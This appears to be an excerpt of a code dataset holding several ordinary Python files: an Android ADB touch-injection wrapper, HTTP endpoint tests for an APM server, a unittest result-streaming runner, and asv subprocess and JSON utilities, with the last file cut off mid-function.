source
stringlengths
3
86
python
stringlengths
75
1.04M
adb.py
import os import time from threading import Thread from pyadb import Device, PyADB from pyandroidtouch import common from pyandroidtouch.py import PyAndroidTouch class PyAndroidTouchADB(PyAndroidTouch): PATH_REMOTE = '/data/local/tmp/android_touch' def __init__(self, device: Device, *args, **kwargs): super().__init__(*args, **kwargs) self._device = device abi = device.abi path_touch = common.get_module_res('libs/%s/android_touch' % abi) if os.path.exists(path_touch): self.print_debug('Pushing "android_touch".') if device.file.push(path_touch, remote=self.PATH_REMOTE): device.execute('chmod', '+x', self.PATH_REMOTE) f = device.forward port = None for p in range(50000, 65535): if f.tcp(p, 8080): port = p break self.set_device(port=port) self.print_debug('Forward Port: %s' % port) self.print_debug('Current Forward Ports: ', *['\n\t%a' % i for i in f.list]) else: raise Exception('Push File Failed!', device.adb.last_exec) else: raise FileNotFoundError('Unsupport ABI: %s.' % abi) self.print_debug('Waiting "android_touch" init.') self._t = Thread(target=self._t_init) self._t.start() while self.pid is None: time.sleep(0.1) self.print_debug('Init Success.') @property def pid(self): out = self._device.execute_out("ps|grep android_touch|awk '{ print $2 }'") if out != '': return int(out) else: return None def _t_init(self): self._device.execute("kill", '-9', self.pid) adb = self._device.adb.copy() adb.current_device.execute(self.PATH_REMOTE) def destroy(self): self._device.execute("kill", '-9', self.pid) self._device.file.delete(self.PATH_REMOTE) self._device.forward.remove('tcp:%s' % self._port) self.print_debug('Destroy Finish.') if __name__ == '__main__': adb = PyADB() device = list(adb.devices.values())[0] pat = PyAndroidTouchADB(device, debug=True) pat.tap(640, 360, finger=2, finger_degree=45) pat.tap(100, 200).wait(500).tap(200, 300).execute() pat.destroy()
test_requests.py
from nose.tools import raises from apmserver import ServerBaseTest, SecureServerBaseTest, ClientSideBaseTest, CorsBaseTest from requests.exceptions import SSLError import requests import json import zlib import gzip import time from datetime import datetime from collections import defaultdict import threading try: from StringIO import StringIO except ImportError: import io class Test(ServerBaseTest): def test_ok(self): transactions = self.get_transaction_payload() r = requests.post(self.transactions_url, json=transactions) assert r.status_code == 202, r.status_code def test_empty(self): transactions = {} r = requests.post(self.transactions_url, json=transactions) assert r.status_code == 400, r.status_code def test_not_existent(self): transactions = {} invalid_url = 'http://localhost:8200/transactionX' r = requests.post(invalid_url, json=transactions) assert r.status_code == 404, r.status_code def test_method_not_allowed(self): r = requests.get(self.transactions_url) assert r.status_code == 405, r.status_code def test_bad_json(self): r = requests.post(self.transactions_url, json="not json") assert r.status_code == 400, r.status_code def test_validation_fail(self): transactions = self.get_transaction_payload() # month and day swapped transactions["transactions"][0]["timestamp"] = "2017-30-05T18:53:27.154Z" r = requests.post(self.transactions_url, json=transactions) assert r.status_code == 400, r.status_code assert "Problem validating JSON document against schema" in r.content, r.content def test_validation_2_fail(self): transactions = self.get_transaction_payload() # timezone offsets not allowed transactions["transactions"][0]["timestamp"] = "2017-05-30T18:53:27.154+00:20" r = requests.post(self.transactions_url, json=transactions) assert r.status_code == 400, r.status_code assert "Problem validating JSON document against schema" in r.content, r.content def test_frontend_default_disabled(self): transactions = self.get_transaction_payload() r = requests.post( 'http://localhost:8200/v1/client-side/transactions', json=transactions) assert r.status_code == 403, r.status_code def test_healthcheck(self): healtcheck_url = 'http://localhost:8200/healthcheck' r = requests.get(healtcheck_url) assert r.status_code == 200, r.status_code def test_gzip(self): transactions = json.dumps(self.get_transaction_payload()) try: out = StringIO() except: out = io.BytesIO() with gzip.GzipFile(fileobj=out, mode="w") as f: try: f.write(transactions) except: f.write(bytes(transactions, 'utf-8')) r = requests.post(self.transactions_url, data=out.getvalue(), headers={'Content-Encoding': 'gzip', 'Content-Type': 'application/json'}) assert r.status_code == 202, r.status_code def test_deflate(self): transactions = json.dumps(self.get_transaction_payload()) try: compressed_data = zlib.compress(transactions) except: compressed_data = zlib.compress(bytes(transactions, 'utf-8')) r = requests.post(self.transactions_url, data=compressed_data, headers={'Content-Encoding': 'deflate', 'Content-Type': 'application/json'}) assert r.status_code == 202, r.status_code def test_gzip_error(self): data = self.get_transaction_payload() r = requests.post(self.transactions_url, json=data, headers={'Content-Encoding': 'gzip', 'Content-Type': 'application/json'}) assert r.status_code == 400, r.status_code def test_deflate_error(self): data = self.get_transaction_payload() r = requests.post(self.transactions_url, data=data, headers={'Content-Encoding': 'deflate', 'Content-Type': 'application/json'}) assert r.status_code == 400, r.status_code def test_expvar_default(self): """expvar should not be exposed by default""" r = requests.get(self.expvar_url) assert r.status_code == 404, r.status_code class SecureTest(SecureServerBaseTest): def test_https_ok(self): transactions = self.get_transaction_payload() r = requests.post("https://localhost:8200/v1/transactions", json=transactions, verify=False) assert r.status_code == 202, r.status_code @raises(SSLError) def test_https_verify(self): transactions = self.get_transaction_payload() requests.post("https://localhost:8200/v1/transactions", json=transactions) class ClientSideTest(ClientSideBaseTest): def test_ok(self): transactions = self.get_transaction_payload() r = requests.post(self.transactions_url, json=transactions) assert r.status_code == 202, r.status_code def test_error_ok(self): errors = self.get_error_payload() r = requests.post(self.errors_url, json=errors) assert r.status_code == 202, r.status_code def test_sourcemap_upload(self): r = self.upload_sourcemap(file_name='bundle.js.map') assert r.status_code == 202, r.status_code def test_sourcemap_upload_fail(self): import os path = os.path.abspath(os.path.join(self.beat_path, 'tests', 'data', 'valid', 'sourcemap', 'bundle.js.map')) file = open(path) r = requests.post(self.sourcemap_url, files={'sourcemap': file}) assert r.status_code == 400, r.status_code class CorsTest(CorsBaseTest): def test_ok(self): transactions = self.get_transaction_payload() r = requests.post(self.transactions_url, json=transactions, headers={ 'Origin': 'http://www.elastic.co'}) assert r.headers['Access-Control-Allow-Origin'] == 'http://www.elastic.co', r.headers assert r.status_code == 202, r.status_code def test_bad_origin(self): # origin must include protocol and match exactly the allowed origin transactions = self.get_transaction_payload() r = requests.post(self.transactions_url, json=transactions, headers={ 'Origin': 'www.elastic.co'}) assert r.status_code == 403, r.status_code def test_no_origin(self): transactions = self.get_transaction_payload() r = requests.post(self.transactions_url, json=transactions) assert r.status_code == 403, r.status_code def test_preflight(self): transactions = self.get_transaction_payload() r = requests.options(self.transactions_url, json=transactions, headers={'Origin': 'http://www.elastic.co', 'Access-Control-Request-Method': 'POST', 'Access-Control-Request-Headers': 'Content-Type, Content-Encoding'}) assert r.status_code == 200, r.status_code assert r.headers['Access-Control-Allow-Origin'] == 'http://www.elastic.co', r.headers assert r.headers['Access-Control-Allow-Headers'] == 'Content-Type, Content-Encoding, Accept', r.headers assert r.headers['Access-Control-Allow-Methods'] == 'POST, OPTIONS', r.headers assert r.headers['Vary'] == 'Origin', r.headers assert r.headers['Content-Length'] == '0', r.headers assert r.headers['Access-Control-Max-Age'] == '3600', r.headers def test_preflight_bad_headers(self): transactions = self.get_transaction_payload() for h in [{'Access-Control-Request-Method': 'POST'}, {'Origin': 'www.elastic.co'}]: r = requests.options(self.transactions_url, json=transactions, headers=h) assert r.status_code == 200, r.status_code assert 'Access-Control-Allow-Origin' not in r.headers.keys(), r.headers assert r.headers['Access-Control-Allow-Headers'] == 'Content-Type, Content-Encoding, Accept', r.headers assert r.headers['Access-Control-Allow-Methods'] == 'POST, OPTIONS', r.headers class RateLimitTest(ClientSideBaseTest): def test_rate_limit(self): transactions = self.get_transaction_payload() threads = [] codes = defaultdict(int) def fire(): r = requests.post(self.transactions_url, json=transactions) codes[r.status_code] += 1 return r.status_code for _ in range(10): threads.append(threading.Thread(target=fire)) for t in threads: t.start() for t in threads: t.join() assert set(codes.keys()) == set([202, 429]), codes assert codes[429] == 4, codes # considering burst time.sleep(1) assert fire() == 202 def test_rate_limit_multiple_ips(self): transactions = self.get_transaction_payload() threads = [] codes = defaultdict(int) def fire(x): ip = '10.11.12.13' if x % 2 else '10.11.12.14' r = requests.post(self.transactions_url, json=transactions, headers={ 'X-Forwarded-For': ip}) codes[r.status_code] += 1 return r.status_code for x in range(14): threads.append(threading.Thread(target=fire, args=(x,))) for t in threads: t.start() for t in threads: t.join() assert set(codes.keys()) == set([202, 429]), codes # considering burst: 1 "too many requests" per ip assert codes[429] == 2, codes time.sleep(1) assert fire(0) == 202 assert fire(1) == 202
runner.py
import json import subprocess import sys from threading import Thread try: from Queue import Queue, Empty except ImportError: from queue import Queue, Empty # python 3.x from events import EventSource from model import TestMethod import pipes def enqueue_output(out, queue): """A utility method for consuming piped output from a subprocess. Reads content from `out` one line at a time, and puts it onto queue for consumption in a separate thread. """ for line in iter(out.readline, b''): queue.put(line.strip().decode('utf-8')) out.close() def parse_status_and_error(post): if post['status'] == 'OK': status = TestMethod.STATUS_PASS error = None elif post['status'] == 's': status = TestMethod.STATUS_SKIP error = 'Skipped: ' + post.get('error') elif post['status'] == 'F': status = TestMethod.STATUS_FAIL error = post.get('error') elif post['status'] == 'x': status = TestMethod.STATUS_EXPECTED_FAIL error = post.get('error') elif post['status'] == 'u': status = TestMethod.STATUS_UNEXPECTED_SUCCESS error = None elif post['status'] == 'E': status = TestMethod.STATUS_ERROR error = post.get('error') return status, error class Runner(EventSource): "A wrapper around the subprocess that executes tests." def __init__(self, project, count, labels, testdir): self.project = project self.proc = subprocess.Popen( self.project.execute_commandline(labels, testdir), stdin=None, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=False, bufsize=1, close_fds='posix' in sys.builtin_module_names ) # Piped stdout/stderr reads are blocking; therefore, we need to # do all our readline calls in a background thread, and use a # queue object to store lines that have been read. self.stdout = Queue() t = Thread(target=enqueue_output, args=(self.proc.stdout, self.stdout)) t.daemon = True t.start() self.stderr = Queue() t = Thread(target=enqueue_output, args=(self.proc.stderr, self.stderr)) t.daemon = True t.start() # The TestMethod object currently under execution. self.current_test = None # An accumulator of ouput from the tests. If buffer is None, # then the test suite isn't currently running - it's in suite # setup/teardown. self.buffer = None # An accumulator for error output from the tests. self.error_buffer = [] # The timestamp when current_test started self.start_time = None # The total count of tests under execution self.total_count = count # The count of tests that have been executed. self.completed_count = 0 # The count of specific test results. self.result_count = {} @property def is_running(self): "Return True if this runner currently running." return self.proc.poll() is None @property def any_failed(self): return sum(self.result_count.get(state, 0) for state in TestMethod.FAILING_STATES) def terminate(self): "Stop the executor." self.proc.terminate() def poll(self): "Poll the runner looking for new test output" stopped = False finished = False # Read from stdout, building a buffer. lines = [] try: while True: lines.append(self.stdout.get(block=False)) except Empty: # queue.get() raises an exception when the queue is empty. # This means there is no more output to consume at this time. pass # Read from stderr, building a buffer. try: while True: self.error_buffer.append(self.stderr.get(block=False)) except Empty: # queue.get() raises an exception when the queue is empty. # This means there is no more output to consume at this time. pass # Check to see if the subprocess is still running. # If it isn't, raise an error. if self.proc is None: stopped = True elif self.proc.poll() is not None: stopped = True # Process all the full lines that are available for line in lines: # Look for a separator. if line in (pipes.PipedTestResult.RESULT_SEPARATOR, pipes.PipedTestRunner.START_TEST_RESULTS, pipes.PipedTestRunner.END_TEST_RESULTS): if self.buffer is None: # Preamble is finished. Set up the line buffer. self.buffer = [] else: # Start of new test result; record the last result # Then, work out what content goes where. pre = json.loads(self.buffer[0]) if len(self.buffer) == 2: # No subtests are present, or only one subtest post = json.loads(self.buffer[1]) status, error = parse_status_and_error(post) else: # We have subtests; capture the most important status (until we can capture all the statuses) status = TestMethod.STATUS_PASS # Assume pass until told otherwise error = '' for line_num in range(1, len(self.buffer)): post = json.loads(self.buffer[line_num]) subtest_status, subtest_error = parse_status_and_error(post) if subtest_status > status: status = subtest_status if subtest_error: error += subtest_error + '\n\n' # Increase the count of executed tests self.completed_count = self.completed_count + 1 # Get the start and end times for the test start_time = float(pre['start_time']) end_time = float(post['end_time']) self.current_test.description = post['description'] self.current_test.set_result( status=status, output=post.get('output'), error=error, duration=end_time - start_time, ) # Work out how long the suite has left to run (approximately) if self.start_time is None: self.start_time = start_time total_duration = end_time - self.start_time time_per_test = total_duration / self.completed_count remaining_time = (self.total_count - self.completed_count) * time_per_test if remaining_time > 4800: remaining = '%s hours' % int(remaining_time / 2400) elif remaining_time > 2400: remaining = '%s hour' % int(remaining_time / 2400) elif remaining_time > 120: remaining = '%s mins' % int(remaining_time / 60) elif remaining_time > 60: remaining = '%s min' % int(remaining_time / 60) else: remaining = '%ss' % int(remaining_time) # Update test result counts self.result_count.setdefault(status, 0) self.result_count[status] = self.result_count[status] + 1 # Notify the display to update. self.emit('test_end', test_path=self.current_test.path, result=status, remaining_time=remaining) # Clear the decks for the next test. self.current_test = None self.buffer = [] if line == pipes.PipedTestRunner.END_TEST_RESULTS: # End of test execution. # Mark the runner as finished, and move back # to a pre-test state in the results. finished = True self.buffer = None else: # Not a separator line, so it's actual content. if self.buffer is None: # Suite isn't running yet - just display the output # as a status update line. self.emit('test_status_update', update=line) else: # Suite is running - have we got an active test? # Doctest (and some other tools) output invisible escape sequences. # Strip these if they exist. if line.startswith('\x1b'): line = line[line.find('{'):] # Store the cleaned buffer self.buffer.append(line) # If we don't have an currently active test, this line will # contain the path for the test. if self.current_test is None: try: # No active test; first line tells us which test is running. pre = json.loads(line) except ValueError: self.emit('suit_end') return True self.current_test = self.project.confirm_exists(pre['path']) self.emit('test_start', test_path=pre['path']) # If we're not finished, requeue the event. if finished: if self.error_buffer: self.emit('suite_end', error='\n'.join(self.error_buffer)) else: self.emit('suite_end') return False elif stopped: # Suite has stopped producing output. if self.error_buffer: self.emit('suite_error', error='\n'.join(self.error_buffer)) else: self.emit('suite_error', error='Test output ended unexpectedly') # Suite has finished; don't requeue return False else: # Still running - requeue event. return True import argparse import unittest class PyTestExecutor(object): ''' This is a thing which, when run, produces a stream of well-formed test result outputs. Its processing is initiated by the top-level Runner class ''' def __init__(self): # Allows the executor to run a specified list of tests self.specified_list = None def flatten_results(self, iterable): input = list(iterable) while input: item = input.pop(0) try: data = iter(item) input = list(data) + input except: yield item def run_only(self, specified_list): self.specified_list = specified_list def stream_suite(self, suite): print ("Calling stream_suite: " + str(suite)) pipes.PipedTestRunner().run(suite) def stream_results(self, testdir=None): if testdir is None: testdir = '.' loader = unittest.TestLoader() tests = loader.discover(testdir) flat_tests = list(self.flatten_results(tests)) if not self.specified_list: suite = loader.discover(testdir) self.stream_suite(suite) else: suite = unittest.TestSuite() # Add individual test cases. for test in flat_tests: if test.id() in self.specified_list: suite.addTest(test) # Add all tests in a file. for specified in self.specified_list: if specified.count('.') == 0: for test in flat_tests: module_name = test.id()[0:test.id().index('.')] if specified == module_name: suite.addTest(test) # Add all tests in a class within a file. for specified in self.specified_list: if specified.count('.') == 1: for test in flat_tests: module_name = test.id()[0:test.id().rindex('.')] if specified == module_name: suite.addTest(test) self.stream_suite(suite) if __name__ == '__main__': parser = argparse.ArgumentParser() parser.add_argument('--testdir', dest='testdir', default='.', help='Directory to choose tests from') parser.add_argument('labels', nargs=argparse.REMAINDER, help='Test labels to run.') options = parser.parse_args() executor = PyTestExecutor() # options.labels = list() # options.labels.append('test_acquire.TestAcquire.test_print_1') if options.labels is not None: print('Labels: ', options.labels) if options.labels: executor.run_only(options.labels) executor.stream_results(options.testdir)
util.py
# Licensed under a 3-clause BSD style license - see LICENSE.rst """ Various low-level utilities. """ import datetime import json import math import os import re import select import signal import subprocess import sys import time import errno import threading import shutil import stat import shlex import operator import collections import multiprocessing from .extern import minify_json WIN = (os.name == 'nt') if not WIN: from select import PIPE_BUF TIMEOUT_RETCODE = -256 terminal_width = shutil.get_terminal_size().columns class UserError(Exception): pass class ParallelFailure(Exception): """ Custom exception to work around a multiprocessing bug https://bugs.python.org/issue9400 """ def __new__(cls, message, exc_cls, traceback_str): self = Exception.__new__(cls) self.message = message self.exc_cls = exc_cls self.traceback_str = traceback_str return self def __reduce__(self): return (ParallelFailure, (self.message, self.exc_cls, self.traceback_str)) def __str__(self): return "{0}: {1}\n {2}".format(self.exc_cls.__name__, self.message, self.traceback_str.replace("\n", "\n ")) def reraise(self): if self.exc_cls is UserError: raise UserError(self.message) else: raise self def human_list(input_list): """ Formats a list of strings in a human-friendly way. """ input_list = ["'{0}'".format(x) for x in input_list] if len(input_list) == 0: return 'nothing' elif len(input_list) == 1: return input_list[0] elif len(input_list) == 2: return ' and '.join(input_list) else: return ', '.join(input_list[:-1]) + ' and ' + input_list[-1] def human_float(value, significant=3, truncate_small=None, significant_zeros=False): """ Return a string representing a float with human friendly significant digits. Switches to scientific notation for too large/small numbers. If `truncate_small`, then leading zeros of numbers < 1 are counted as significant. If not `significant_zeros`, trailing unnecessary zeros are stripped. """ if value == 0: return "0" elif math.isinf(value) or math.isnan(value): return "{}".format(value) elif value < 0: sign = "-" value = -value else: sign = "" logv = math.log10(value) magnitude = int(math.floor(logv)) + 1 if truncate_small is not None: magnitude = max(magnitude, -truncate_small + 1) num_digits = significant - magnitude if magnitude <= -5 or magnitude >= 9: # Too many digits, use scientific notation fmt = "{{0:.{0}e}}".format(significant) elif value == int(value): value = int(round(value, num_digits)) fmt = "{0:d}" elif num_digits <= 0: value = int(round(value, num_digits)) fmt = "{0:d}" else: fmt = "{{0:.{0}f}}".format(num_digits) formatted = sign + fmt.format(value) if not significant_zeros and '.' in formatted and 'e' not in fmt: formatted = formatted.rstrip('0') if formatted[-1] == '.': formatted = formatted[:-1] if significant_zeros and '.' not in formatted: if len(formatted) < significant: formatted += "." + "0" * (significant - len(formatted)) return formatted def human_file_size(size, err=None): """ Returns a human-friendly string representing a file size that is 2-4 characters long. For example, depending on the number of bytes given, can be one of:: 256b 64k 1.1G Parameters ---------- size : int The size of the file (in bytes) Returns ------- size : str A human-friendly representation of the size of the file """ size = float(size) if size < 1: size = 0.0 suffixes = ' kMGTPEH' if size == 0: num_scale = 0 else: num_scale = int(math.floor(math.log(size) / math.log(1000))) if num_scale > 7: suffix = '?' else: suffix = suffixes[num_scale].strip() scale = int(math.pow(1000, num_scale)) value = size / scale str_value = human_float(value, 3) if err is None: return "{0:s}{1}".format(str_value, suffix) else: str_err = human_float(err / scale, 1, truncate_small=2) return "{0:s}±{1:s}{2}".format(str_value, str_err, suffix) _human_time_units = ( ('ns', 0.000000001), ('μs', 0.000001), ('ms', 0.001), ('s', 1), ('m', 60), ('h', 60 * 60), ('d', 60 * 60 * 24), ('w', 60 * 60 * 24 * 7), ('y', 60 * 60 * 24 * 7 * 52), ('C', 60 * 60 * 24 * 7 * 52 * 100) ) def human_time(seconds, err=None): """ Returns a human-friendly time string that is always exactly 6 characters long. Depending on the number of seconds given, can be one of:: 1w 3d 2d 4h 1h 5m 1m 4s 15s Will be in color if console coloring is turned on. Parameters ---------- seconds : int The number of seconds to represent Returns ------- time : str A human-friendly representation of the given number of seconds that is always exactly 6 characters. """ units = _human_time_units seconds = float(seconds) scale = seconds if scale == 0 and err is not None: scale = float(err) if scale == 0: # Represent zero in reasonable units units = [('s', 1), ('m', 60)] if scale != scale: # nan return "n/a" for i in range(len(units) - 1): if scale < units[i + 1][1]: str_time = human_float(seconds / units[i][1], 3, significant_zeros=True) if err is None: return "{0:s}{1}".format(str_time, units[i][0]) else: str_err = human_float(err / units[i][1], 1, truncate_small=2) return "{0:s}±{1:s}{2}".format(str_time, str_err, units[i][0]) return '~0' def human_value(value, unit, err=None): """ Formats a value in a given unit in a human friendly way. Parameters ---------- value : anything The value to format unit : str The unit the value is in. Currently understands `seconds` and `bytes`. err : float, optional Std. error in the value """ if isinstance(value, (int, float)): if value != value: # nan display = "n/a" elif unit == 'seconds': display = human_time(value, err=err) elif unit == 'bytes': display = human_file_size(value, err=err) else: display = json.dumps(value) if err is not None: display += "±{:.2g}".format(err) elif value is None: display = "failed" else: display = json.dumps(value) return display def parse_human_time(string, base_period='d'): """ Parse a human-specified time period to an integer number of seconds. The following format is accepted: <number><suffix> Raises a ValueError on parse error. """ units = dict(_human_time_units) units[''] = units[base_period] suffixes = '|'.join(units.keys()) try: m = re.match(r'^\s*([0-9.]+)\s*({})\s*$'.format(suffixes), string) if m is None: raise ValueError() return float(m.group(1)) * units[m.group(2)] except ValueError: raise ValueError("%r is not a valid time period (valid units: %s)" % (string, suffixes)) def which(filename, paths=None): """ Emulates the UNIX `which` command in Python. Raises an IOError if no result is found. """ # Hide traceback from expected exceptions in pytest reports __tracebackhide__ = operator.methodcaller('errisinstance', IOError) if os.path.sep in filename: locations = [''] elif paths is not None: locations = paths else: locations = os.environ.get("PATH", "").split(os.pathsep) if WIN: # On windows, an entry in %PATH% may be quoted locations = [path[1:-1] if len(path) > 2 and path[0] == path[-1] == '"' else path for path in locations] if WIN: filenames = [filename + ext for ext in ('.exe', '.bat', '.com', '')] else: filenames = [filename] candidates = [] for location in locations: for filename in filenames: candidate = os.path.join(location, filename) if os.path.isfile(candidate) or os.path.islink(candidate): candidates.append(candidate) if len(candidates) == 0: if paths is None: loc_info = 'PATH' else: loc_info = os.pathsep.join(locations) raise IOError("Could not find '{0}' in {1}".format(filename, loc_info)) return candidates[0] def has_command(filename): """ Returns `True` if the commandline utility exists. """ try: which(filename) except IOError: return False else: return True class ProcessError(subprocess.CalledProcessError): def __init__(self, args, retcode, stdout, stderr): self.args = args self.retcode = retcode self.stdout = stdout self.stderr = stderr def __str__(self): if self.retcode == TIMEOUT_RETCODE: return "Command '{0}' timed out".format( ' '.join(self.args)) else: return "Command '{0}' returned non-zero exit status {1}".format( ' '.join(self.args), self.retcode) def check_call(args, valid_return_codes=(0,), timeout=600, dots=True, display_error=True, shell=False, env=None, cwd=None): """ Runs the given command in a subprocess, raising ProcessError if it fails. See `check_output` for parameters. """ # Hide traceback from expected exceptions in pytest reports __tracebackhide__ = operator.methodcaller('errisinstance', ProcessError) check_output( args, valid_return_codes=valid_return_codes, timeout=timeout, dots=dots, display_error=display_error, shell=shell, env=env, cwd=cwd) class DebugLogBuffer: def __init__(self, log): self.buf = [] self.first = True self.linebreak_re = re.compile(b'.*\n') self.log = log self.lock = threading.Lock() def __call__(self, c): with self.lock: self._process(c) def _process(self, c): if c is None: text = b"".join(self.buf) del self.buf[:] elif b'\n' in c: m = self.linebreak_re.match(c) j = m.end() self.buf.append(c[:j]) text = b"".join(self.buf) self.buf[:] = [c[j:]] else: self.buf.append(c) return text = text.decode('utf-8', 'replace') if text.endswith('\n'): text = text[:-1] if text: if self.first: self.log.debug('OUTPUT -------->', continued=True) self.first = False self.log.debug(text, continued=True) def check_output(args, valid_return_codes=(0,), timeout=600, dots=True, display_error=True, shell=False, return_stderr=False, env=None, cwd=None, redirect_stderr=False, return_popen=False): """ Runs the given command in a subprocess, raising ProcessError if it fails. Returns stdout as a string on success. Parameters ---------- valid_return_codes : list, optional A list of return codes to ignore. Defaults to only ignoring zero. Setting to None ignores all return codes. timeout : number, optional Kill the process if it does not produce any output in `timeout` seconds. If `None`, there is no timeout. Default: 10 min dots : bool, optional If `True` (default) write a dot to the console to show progress as the subprocess outputs content. May also be a callback function to call (with no arguments) to indicate progress. display_error : bool, optional If `True` (default) display the stdout and stderr of the subprocess when the subprocess returns an error code. shell : bool, optional If `True`, run the command through the shell. Default is `False`. return_stderr : bool, optional If `True`, return both the (stdout, stderr, errcode) as a tuple. env : dict, optional Specify environment variables for the subprocess. cwd : str, optional Specify the current working directory to use when running the process. redirect_stderr : bool, optional Whether to redirect stderr to stdout. In this case the returned ``stderr`` (when return_stderr == True) is an empty string. return_popen : bool, optional Whether to return immediately after subprocess.Popen. Returns ------- stdout, stderr, retcode : when return_stderr == True stdout : otherwise """ from .console import log # Hide traceback from expected exceptions in pytest reports __tracebackhide__ = operator.methodcaller('errisinstance', ProcessError) def get_content(header=None): content = [] if header is not None: content.append(header) if redirect_stderr: content.extend([ 'OUTPUT -------->', stdout[:-1] ]) else: content.extend([ 'STDOUT -------->', stdout[:-1], 'STDERR -------->', stderr[:-1] ]) return '\n'.join(content) if isinstance(args, str): args = [args] log.debug("Running '{0}'".format(' '.join(args))) kwargs = dict(shell=shell, env=env, cwd=cwd, stdout=subprocess.PIPE, stderr=subprocess.PIPE) if redirect_stderr: kwargs['stderr'] = subprocess.STDOUT if WIN: kwargs['close_fds'] = False kwargs['creationflags'] = subprocess.CREATE_NEW_PROCESS_GROUP else: kwargs['close_fds'] = True posix = getattr(os, 'setpgid', None) if posix: # Run the subprocess in a separate process group, so that we # can kill it and all child processes it spawns e.g. on # timeouts. Note that subprocess.Popen will wait until exec() # before returning in parent process, so there is no race # condition in setting the process group vs. calls to os.killpg kwargs['preexec_fn'] = lambda: os.setpgid(0, 0) proc = subprocess.Popen(args, **kwargs) if return_popen: return proc last_dot_time = time.time() stdout_chunks = [] stderr_chunks = [] is_timeout = False if log.is_debug_enabled(): debug_log = DebugLogBuffer(log) dots = False else: def debug_log(c): return None if WIN: start_time = [time.time()] dot_start_time = start_time[0] is_timeout = False def stream_reader(stream, buf): try: while not is_timeout: c = stream.read(1) if not c: break start_time[0] = time.time() buf.append(c) debug_log(c) finally: stream.close() stdout_reader = threading.Thread(target=stream_reader, args=(proc.stdout, stdout_chunks)) stdout_reader.daemon = True stdout_reader.start() all_threads = [stdout_reader] if not redirect_stderr: stderr_reader = threading.Thread(target=stream_reader, args=(proc.stderr, stderr_chunks)) stderr_reader.daemon = True stderr_reader.start() all_threads.append(stderr_reader) # Wait for reader threads threads = list(all_threads) while threads: thread = threads[0] if timeout is None: remaining = None else: remaining = timeout - (time.time() - start_time[0]) if remaining <= 0: # Timeout; we won't wait for the thread to join here if not is_timeout: is_timeout = True proc.send_signal(signal.CTRL_BREAK_EVENT) threads.pop(0) continue if dots: dot_remaining = 0.5 - (time.time() - last_dot_time) if dot_remaining <= 0: # Print a dot only if there has been output if dot_start_time != start_time[0]: if dots is True: log.dot() elif dots: dots() dot_start_time = start_time[0] last_dot_time = time.time() dot_remaining = 0.5 if remaining is None: remaining = dot_remaining else: remaining = min(dot_remaining, remaining) thread.join(remaining) if not thread.is_alive(): threads.pop(0) if is_timeout: proc.terminate() # Wait a bit for the reader threads, if they're alive for thread in all_threads: thread.join(0.1) # Wait for process to exit proc.wait() else: try: if posix and is_main_thread(): # Forward signals related to Ctrl-Z handling; the child # process is in a separate process group so it won't receive # these automatically from the terminal def sig_forward(signum, frame): _killpg_safe(proc.pid, signum) if signum == signal.SIGTSTP: os.kill(os.getpid(), signal.SIGSTOP) signal.signal(signal.SIGTSTP, sig_forward) signal.signal(signal.SIGCONT, sig_forward) fds = {proc.stdout.fileno(): stdout_chunks} if not redirect_stderr: fds[proc.stderr.fileno()] = stderr_chunks while proc.poll() is None: try: if timeout is None: rlist, wlist, xlist = select.select( list(fds.keys()), [], []) else: rlist, wlist, xlist = select.select( list(fds.keys()), [], [], timeout) except select.error as err: if err.args[0] == errno.EINTR: # interrupted by signal handler; try again continue raise if len(rlist) == 0: # We got a timeout is_timeout = True break for f in rlist: output = os.read(f, PIPE_BUF) fds[f].append(output) debug_log(output) if dots and time.time() - last_dot_time > 0.5: if dots is True: log.dot() elif dots: dots() last_dot_time = time.time() finally: if posix and is_main_thread(): # Restore signal handlers signal.signal(signal.SIGTSTP, signal.SIG_DFL) signal.signal(signal.SIGCONT, signal.SIG_DFL) if proc.returncode is None: # Timeout or another exceptional condition occurred, and # the program is still running. if posix: # Terminate the whole process group _killpg_safe(proc.pid, signal.SIGTERM) for j in range(10): time.sleep(0.1) if proc.poll() is not None: break else: # Didn't terminate within 1 sec, so kill it _killpg_safe(proc.pid, signal.SIGKILL) else: proc.terminate() proc.wait() proc.stdout.flush() if not redirect_stderr: proc.stderr.flush() stdout_chunks.append(proc.stdout.read()) if not redirect_stderr: stderr_chunks.append(proc.stderr.read()) proc.stdout.close() if not redirect_stderr: proc.stderr.close() # Flush and disconnect debug log, if any debug_log(None) def debug_log(c): return None stdout = b''.join(stdout_chunks) stderr = b''.join(stderr_chunks) stdout = stdout.decode('utf-8', 'replace') stderr = stderr.decode('utf-8', 'replace') if is_timeout: retcode = TIMEOUT_RETCODE else: retcode = proc.returncode if valid_return_codes is not None and retcode not in valid_return_codes: header = 'Error running {0} (exit status {1})'.format(' '.join(args), retcode) if display_error: if log.is_debug_enabled(): # Output was already printed log.error(header) else: log.error(get_content(header)) raise ProcessError(args, retcode, stdout, stderr) if return_stderr: return (stdout, stderr, retcode) else: return stdout def _killpg_safe(pgid, signo): """ Same as os.killpg, but deal with OSX/BSD """ try: os.killpg(pgid, signo) except OSError as exc: if exc.errno == errno.EPERM: # OSX/BSD may raise EPERM on killpg if the process group # already terminated pass else: raise def is_main_thread(): """ Return True if the current thread is the main thread. """ return threading.current_thread() == threading.main_thread() def write_json(path, data, api_version=None, compact=False): """ Writes JSON to the given path, including indentation and sorting. Parameters ---------- path : str File name to write data : object Data to serialize as JSON api_version : int, optional API version number compact : bool, optional Whether to produce compact, non-human readable JSON. Disables sorting and indentation. """ path = os.path.abspath(path) dirname = long_path(os.path.dirname(path)) if not os.path.exists(dirname): os.makedirs(dirname) if api_version is not None: data = dict(data) data['version'] = api_version open_kwargs = {} open_kwargs['encoding'] = 'utf-8' with long_path_open(path, 'w', **open_kwargs) as fd: if not compact: json.dump(data, fd, indent=4, sort_keys=True) else: json.dump(data, fd) def load_json(path, api_version=None, js_comments=False): """ Loads JSON from the given path. Parameters ---------- path : str File name api_version : str or None API version indentifier js_comments : bool, optional Whether to allow nonstandard javascript-style comments in the file. Note that this slows down the loading significantly. """ # Hide traceback from expected exceptions in pytest reports __tracebackhide__ = operator.methodcaller('errisinstance', UserError) path = os.path.abspath(path) open_kwargs = {} open_kwargs['encoding'] = 'utf-8' with long_path_open(path, 'r', **open_kwargs) as fd: content = fd.read() if js_comments: content = minify_json.json_minify(content) content = content.replace(",]", "]") content = content.replace(",}", "}") try: d = json.loads(content) except ValueError as e: raise UserError( "Error parsing JSON in file '{0}': {1}".format( path, str(e))) if api_version is not None: if 'version' in d: if d['version'] < api_version: raise UserError( "{0} is stored in an old file format. Run " "`asv update` to update it.".format(path)) elif d['version'] > 